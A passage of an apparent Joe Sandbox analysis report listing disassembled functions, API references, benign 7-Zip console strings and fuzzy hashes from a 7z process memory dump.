                                                                                                                                                                                                • Opcode Fuzzy Hash: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                                                                                                                                                                                • Instruction Fuzzy Hash: 68012C6325E5C085CA29FB32E452B6E6350FBCBB91F8410A2AF4E13711CE38C487C204
                                                                                                                                                                                                Function 00973677 Relevance: 11.3, APIs: 9, Instructions: 48COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                                                                                                                                                                                • Instruction ID: fa5439c127951fb76e81e4df1e95c3df57f14beec591215820a36c72b5cb8304
                                                                                                                                                                                                • Opcode Fuzzy Hash: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                                                                                                                                                                                • Instruction Fuzzy Hash: AD01B66325A5C045CA19FF36E462B6E6390FBCBB91F8150A2AF4E53725CE38C487C608
                                                                                                                                                                                                Function 009868FC Relevance: 11.3, APIs: 9, Instructions: 45COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                                                                                                                                                                                • Instruction ID: 44b69fdd63e60b76dc9b5486fd1e8b9d5e4388d13de0d64c56267bf755535b7a
                                                                                                                                                                                                • Opcode Fuzzy Hash: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                                                                                                                                                                                • Instruction Fuzzy Hash: E501DA637159C489CA18FF76DC91A682364BFCABA87984171FF1E4B755DE20CC928344
                                                                                                                                                                                                Function 0094F0C8 Relevance: 11.3, APIs: 9, Instructions: 44COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                                                                                • Instruction ID: b8c20bfe6afd8e9ebb1bd0735ad080aa1302bae8360a46783f54d40b932a4e60
                                                                                                                                                                                                • Opcode Fuzzy Hash: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 55011A636159C08ACB18AF36DC91A682764BFCAB98B984171BF2D4B755DE60C8828344
                                                                                                                                                                                                Function 0098C844 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 195COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098C91C
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098C9F1
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: memset.MSVCRT ref: 0098B20D
                                                                                                                                                                                                  • Part of subcall function 0098B1C8: fputs.MSVCRT ref: 0098B232
                                                                                                                                                                                                  • Part of subcall function 00942320: free.MSVCRT ref: 0094237E
                                                                                                                                                                                                  • Part of subcall function 00942320: fputs.MSVCRT ref: 009423B8
                                                                                                                                                                                                  • Part of subcall function 00942320: free.MSVCRT ref: 009423C4
                                                                                                                                                                                                  • Part of subcall function 00942300: fputc.MSVCRT ref: 00942311
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098CADA
                                                                                                                                                                                                  • Part of subcall function 009422E4: fflush.MSVCRT ref: 009422EB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$free$fflushfputcmemset
                                                                                                                                                                                                • String ID: ERROR: $ERRORS:$WARNINGS:
                                                                                                                                                                                                • API String ID: 2975459029-4064182643
                                                                                                                                                                                                • Opcode ID: 0028e4c7587573bd9f515618cfbb5301f3e1817b887f44ee0e76695e23076ce5
                                                                                                                                                                                                • Instruction ID: b9ea9e7a1a5a83c912592aa74b499fba1133498db027af31bca335f6e18513e0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0028e4c7587573bd9f515618cfbb5301f3e1817b887f44ee0e76695e23076ce5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 94615EA2700A859ACA38FF72E49176E7325F785B84F884026EF5F07706DF78D8958360
                                                                                                                                                                                                Function 00975680 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 181COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID: : $...$Junction: $REPARSE:
                                                                                                                                                                                                • API String ID: 1294909896-1476144188
                                                                                                                                                                                                • Opcode ID: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                                                                                                                                                • Instruction ID: d2ac294b27aa1cd98d65f099b9e21a48631af1d9e4ed7f5aae64161c405a3e8b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C511423210A4592CB64EF25E842BAA7765FBC07A8F86D022EA8B47355DFBCC545CB10
                                                                                                                                                                                                Function 00980E6C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 00980E9C
                                                                                                                                                                                                  • Part of subcall function 0094339C: free.MSVCRT ref: 009433D7
                                                                                                                                                                                                  • Part of subcall function 0094339C: memmove.MSVCRT(00000000,?,?,00000000,009410A8), ref: 009433F2
                                                                                                                                                                                                • fputs.MSVCRT ref: 00980F5D
                                                                                                                                                                                                • fputs.MSVCRT ref: 00980FD8
                                                                                                                                                                                                • fputs.MSVCRT ref: 00980FF4
                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 00981092
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$CriticalSection$EnterLeavefreememmove
                                                                                                                                                                                                • String ID: ???
                                                                                                                                                                                                • API String ID: 2578255354-1053719742
                                                                                                                                                                                                • Opcode ID: be1a40be557d259925390312d71c451b002569341349d622961d0d476c9d9d15
                                                                                                                                                                                                • Instruction ID: dc741a9a0fdaed045181fb4a0a9d3d1af6c497df55a1457b4176cf4e46cf1381
                                                                                                                                                                                                • Opcode Fuzzy Hash: be1a40be557d259925390312d71c451b002569341349d622961d0d476c9d9d15
                                                                                                                                                                                                • Instruction Fuzzy Hash: E1519272300A81A3DB68EF25D9503EE6324F785B94F848516DF2E07761DF38D9A9C300
                                                                                                                                                                                                Function 00980C64 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Would you like to replace the existing file:, xrefs: 00980CF0
                                                                                                                                                                                                • with the file from archive:, xrefs: 00980D1C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CriticalSectionfputs$EnterLeave
                                                                                                                                                                                                • String ID: Would you like to replace the existing file:$with the file from archive:
                                                                                                                                                                                                • API String ID: 3346953513-686978020
                                                                                                                                                                                                • Opcode ID: 7412e7fb1b6ccc606eca1224af26252d797eb43481bfe92c889a2551bdc217a5
                                                                                                                                                                                                • Instruction ID: 0aaf499688a9904cc2cf1a3bc6308aeaad4045d832b7d81056283ef6561f0da9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7412e7fb1b6ccc606eca1224af26252d797eb43481bfe92c889a2551bdc217a5
                                                                                                                                                                                                • Instruction Fuzzy Hash: E441E66234478292DBA8AF65D8507A97364F7C6B90F4886229F6D07792CF3CD89CD305
                                                                                                                                                                                                Function 009812B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CriticalSectionfputs$EnterLeavefree
                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                • API String ID: 1989314732-3653984579
                                                                                                                                                                                                • Opcode ID: a9e7b779069d7613123e0b6a527abe8c78201bf88696ae9abb195fc48f8ffdd4
                                                                                                                                                                                                • Instruction ID: ee27a09519aa8ea5b4542d407a99be0f4eee694ad5a33e85871dda4942515ea6
                                                                                                                                                                                                • Opcode Fuzzy Hash: a9e7b779069d7613123e0b6a527abe8c78201bf88696ae9abb195fc48f8ffdd4
                                                                                                                                                                                                • Instruction Fuzzy Hash: BE314A72200A4081DB25AF25D8947AD2374F789FA8F985236EE5E4B7A9DF78C885C310
                                                                                                                                                                                                Function 0098CE50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Enter password (will not be echoed):, xrefs: 0098CE69
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ConsoleMode$Handlefflushfputs
                                                                                                                                                                                                • String ID: Enter password (will not be echoed):
                                                                                                                                                                                                • API String ID: 108775803-3720017889
                                                                                                                                                                                                • Opcode ID: b3b14cee00391645aedadfe40ccae594c45a57101052151f518e341e407f9c9a
                                                                                                                                                                                                • Instruction ID: 63439a17f22f2df6a834b2ab103ac47d34952d6367ad26a0587c640289438910
                                                                                                                                                                                                • Opcode Fuzzy Hash: b3b14cee00391645aedadfe40ccae594c45a57101052151f518e341e407f9c9a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D210A6230560142FE28AB66AD147392361AF89BB1F189224EF2B4B3E6DF7CC845D310
                                                                                                                                                                                                Function 00981AA8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputsfree
                                                                                                                                                                                                • String ID: Can not open the file$The archive is open with offset$The file is open$WARNING:
                                                                                                                                                                                                • API String ID: 2581285248-3393983761
                                                                                                                                                                                                • Opcode ID: 508089e93e5762c25ef1d7ab05736a957ed921444384873a384d5238f926eb99
                                                                                                                                                                                                • Instruction ID: d70347c2c5b3ad95b5456e960f14f44ce956eeaf435fd332274f1f2dea856a45
                                                                                                                                                                                                • Opcode Fuzzy Hash: 508089e93e5762c25ef1d7ab05736a957ed921444384873a384d5238f926eb99
                                                                                                                                                                                                • Instruction Fuzzy Hash: 11218363300A4595CE25EF26E85079D6734F7C9BE8F844226EE1E47369EF28C64AC700
                                                                                                                                                                                                Function 0098DBA0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Version$AddressHandleModuleProc
                                                                                                                                                                                                • String ID: SetDefaultDllDirectories$kernel32.dll
                                                                                                                                                                                                • API String ID: 2268189529-2102062458
                                                                                                                                                                                                • Opcode ID: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
                                                                                                                                                                                                • Instruction ID: c9d7d2dc6b0e4a91de3c227ee180e2e8958c9ce0f0a3c4b7f6a5677c099674b8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
                                                                                                                                                                                                • Instruction Fuzzy Hash: 78F05831206A02C2EF30AB50F8643A923A4FB89709F545228C28E813B1EF3CCA4CCB00
                                                                                                                                                                                                Function 00977614 Relevance: 10.2, APIs: 8, Instructions: 196COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                                                                                                                                                                                • Instruction ID: 5bb7e240205a84de914746a15dfcdac8bd003ac551d8f9a522186e80039c7d4f
                                                                                                                                                                                                • Opcode Fuzzy Hash: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A71C02321C6C096CA20EB65E480B9EF764F7CA754FA49102FBDE43B59DB78C945CB01
                                                                                                                                                                                                Function 0096BB68 Relevance: 10.1, APIs: 8, Instructions: 136COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                • Opcode ID: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                                                                                                                                                                                • Instruction ID: ccc8114011d844efb3bb4f697d098f831ed46f756a04508d2ace92d915427de1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                                                                                                                                                                                • Instruction Fuzzy Hash: D74125622082C095CB35AF39D4117AD37A0EBD2B98F544111EB9A8B795EFBCC6C6C700
                                                                                                                                                                                                Function 00960A58 Relevance: 10.1, APIs: 8, Instructions: 90COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: freememmove$ExceptionThrowmalloc
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1818558235-0
                                                                                                                                                                                                • Opcode ID: 765776f35c77edad6c13728d38dc7fcf5a9f6dac0127373448571f55f4189822
                                                                                                                                                                                                • Instruction ID: 4e0ee25a044a0e1a1c1a34bf678901fc3e906e42f7a0fc50d9160e8c6ba7d1f9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 765776f35c77edad6c13728d38dc7fcf5a9f6dac0127373448571f55f4189822
                                                                                                                                                                                                • Instruction Fuzzy Hash: E5312F727112948B8B64DF7AD49251E73E8F788FD83548026EF1D97748DA34DC82CB80
                                                                                                                                                                                                Function 00973162 Relevance: 10.0, APIs: 8, Instructions: 42COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                                                                                                                                                • Instruction ID: 2cfff55dd134d14d12d65a6b3ac47caa825f77f702edf38c50adaa6e24a85fd4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                                                                                                                                                • Instruction Fuzzy Hash: 96F0F92225E5D085CA28FF32C495B2E6791FFCBF81B846461BB4E63715DE28C446C604
                                                                                                                                                                                                Function 009730A8 Relevance: 10.0, APIs: 8, Instructions: 41COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
